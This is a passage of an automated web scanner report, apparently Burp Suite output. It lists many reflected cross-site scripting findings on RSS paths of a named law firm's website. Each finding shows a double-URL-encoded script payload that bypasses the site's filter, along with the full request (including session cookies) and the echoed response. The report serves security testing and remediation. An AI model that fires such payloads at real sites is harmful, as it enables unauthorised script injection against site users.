<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Election_Law__Government_Ethicsde06e"><script>alert(1)</script>97b01f23fb3/rss.xml" value="">
...[SNIP]...

4.238. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac was submitted in the REST URL parameter 4. This input was echoed as 6d35d"><script>alert(1)</script>1977a3e2ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Election_Law__Government_Ethics/rss.xml6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Election_Law__Government_Ethics/rss.xml6d35d"><script>alert(1)</script>1977a3e2ac" value="">
...[SNIP]...

4.239. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b was submitted in the REST URL parameter 1. This input was echoed as 290f3"><script>alert(1)</script>18476e2452b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b/practices/Employment__Labor/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss290f3"><script>alert(1)</script>18476e2452b/practices/Employment__Labor/rss.xml" value="">
...[SNIP]...

4.240. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732 was submitted in the REST URL parameter 2. This input was echoed as 9b5ec"><script>alert(1)</script>43dabe5a732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732/Employment__Labor/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices9b5ec"><script>alert(1)</script>43dabe5a732/Employment__Labor/rss.xml" value="">
...[SNIP]...

4.241. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8 was submitted in the REST URL parameter 3. This input was echoed as e75a9"><script>alert(1)</script>28bea29faf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Employment__Labore75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Employment__Labore75a9"><script>alert(1)</script>28bea29faf8/rss.xml" value="">
...[SNIP]...

4.242. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db was submitted in the REST URL parameter 4. This input was echoed as 7e26b"><script>alert(1)</script>a05a8e876db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Employment__Labor/rss.xml7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Employment__Labor/rss.xml7e26b"><script>alert(1)</script>a05a8e876db" value="">
...[SNIP]...

4.243. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c was submitted in the REST URL parameter 1. This input was echoed as ac191"><script>alert(1)</script>408ea2dc39c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c/practices/Environment__Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssac191"><script>alert(1)</script>408ea2dc39c/practices/Environment__Safety/rss.xml" value="">
...[SNIP]...

4.244. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d was submitted in the REST URL parameter 2. This input was echoed as faef9"><script>alert(1)</script>09c7b47057d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesfaef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d/Environment__Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesfaef9"><script>alert(1)</script>09c7b47057d/Environment__Safety/rss.xml" value="">
...[SNIP]...

4.245. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872 was submitted in the REST URL parameter 3. This input was echoed as 14f97"><script>alert(1)</script>df3bd752872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Environment__Safety14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Environment__Safety14f97"><script>alert(1)</script>df3bd752872/rss.xml" value="">
...[SNIP]...

4.246. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 was submitted in the REST URL parameter 4. This input was echoed as a8458"><script>alert(1)</script>9d96a6b3a12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Environment__Safety/rss.xmla8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Environment__Safety/rss.xmla8458"><script>alert(1)</script>9d96a6b3a12" value="">
...[SNIP]...

4.247. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2 was submitted in the REST URL parameter 1. This input was echoed as 53bc2"><script>alert(1)</script>4c6054d33b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss53bc2"><script>alert(1)</script>4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml" value="">
...[SNIP]...

4.248. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82 was submitted in the REST URL parameter 2. This input was echoed as 99d18"><script>alert(1)</script>a1c0da64d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices99d18"><script>alert(1)</script>a1c0da64d82/Food__Drug_and_Product_Safety/rss.xml" value="">
...[SNIP]...

4.249. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21 was submitted in the REST URL parameter 3. This input was echoed as de427"><script>alert(1)</script>3670bef0e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Food__Drug_and_Product_Safetyde427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Food__Drug_and_Product_Safetyde427"><script>alert(1)</script>3670bef0e21/rss.xml" value="">
...[SNIP]...

4.250. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 was submitted in the REST URL parameter 4. This input was echoed as f92a2"><script>alert(1)</script>41efcd82b21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2"><script>alert(1)</script>41efcd82b21" value="">
...[SNIP]...

4.251. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06 was submitted in the REST URL parameter 1. This input was echoed as a6fba"><script>alert(1)</script>a4316059e06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssa6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06/practices/Franchise/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssa6fba"><script>alert(1)</script>a4316059e06/practices/Franchise/rss.xml" value="">
...[SNIP]...

4.252. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0 was submitted in the REST URL parameter 2. This input was echoed as b78b0"><script>alert(1)</script>9778950fc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

